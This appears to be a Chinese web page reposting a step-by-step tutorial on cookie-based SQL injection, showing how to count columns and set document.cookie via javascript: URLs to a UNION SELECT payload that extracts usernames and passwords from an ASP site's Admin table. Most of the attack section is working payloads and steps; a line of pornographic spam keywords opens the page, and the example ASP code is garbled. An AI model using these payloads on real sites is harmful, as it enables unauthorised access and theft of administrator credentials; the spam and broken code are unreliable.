人妖在线一区,国产日韩欧美一区二区综合在线,国产啪精品视频网站免费,欧美内射深插日本少妇

新聞動態(tài)

教你學會Cookie與聯合查詢的注入

發(fā)布日期:2021-12-18 14:30 | 文章來源:腳本之家
具體的原理與分析過程我就不寫了,寫起來一大片,大家看的心煩我寫的頭痛,我就講操作過程中的細節(jié)。隱私報告里設置處需要接受所有的cookie將安全降低。

具體的原理與分析過程我就不寫了,寫起來一大片,大家看的心煩我寫的頭痛,我就講操作過程中的細節(jié)。隱私報告里設置處需要接受所有的cookie將安全降低。

cookie值是連接后才保存到本機的,也就是關IE后.

前提條件:一、網站沒有過濾cookie方式的注入。

二、需事前了解數據庫的管理員表段名,計算一下注入文件數據庫查詢語句在數據庫中的列數。

打開數據庫,找到Product這個表名,計算字段數為21個。管理員表名為admin 用戶與密碼字段名為username、password,呵呵沒有注入文件,我們可以自己構造一個測試方便大家的理解。

構造如下簡單注入ASP,當然我沒作什么嚴格的過濾,也就是接受任何方式的提交。.

//調用數據庫連接文件

")

else

%>

//反回指針處的內容,選取的字段與管理員的用戶密碼類型要相同

找前圖中的ID=55

構造聯合查詢語句

and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin 將6,2分別用username、password替換

來試試cookie注入。找個目標,注入點結構與前面相近就不再分析了,僅過濾了post與get注入.

步驟一:重新打開IE,先連接到需注入的網站http://127.0.0.1/nf,也就是去除前面的鏈接值。注意:不要直接在前面圖中的鏈接處操作,可以會不成功噢。

步驟二:清空地址處IE,再次在地址中加入如下

javascript:alert(document.cookie="id=" escape("56 and 1=2 union select 1,

2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin"))

再次清空IE打入http://127.0.0.1/nf/ProductShow.asp

步驟四:重復步驟一.注意此步驟必需操作,很多人失敗就在這里。

步驟五:清空地址處IE,再次在地址中如下代碼

javascript:alert(document.cookie="id=" escape("56 and 1=2 union select 1,

username,3,4,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin"))

步驟六、再次清空地址處IE。http://127.0.0.1/nf/ProductShow.asp

好了全文結束。

版權聲明:本站文章來源標注為YINGSOO的內容版權均為本站所有,歡迎引用、轉載,請保持原文完整并注明來源及原文鏈接。禁止復制或仿造本網站,禁止在非www.sddonglingsh.com所屬的服務器上建立鏡像,否則將依法追究法律責任。本站部分內容來源于網友推薦、互聯網收集整理而來,僅供學習參考,不代表本站立場,如有內容涉嫌侵權,請聯系alex-e#qq.com處理。

相關文章

實時開通

自選配置、實時開通

免備案

全球線路精選!

全天候客戶服務

7x24全年不間斷在線

專屬顧問服務

1對1客戶咨詢顧問

在線
客服

在線客服:7*24小時在線

客服
熱線

400-630-3752
7*24小時客服服務熱線

關注
微信

關注官方微信
頂部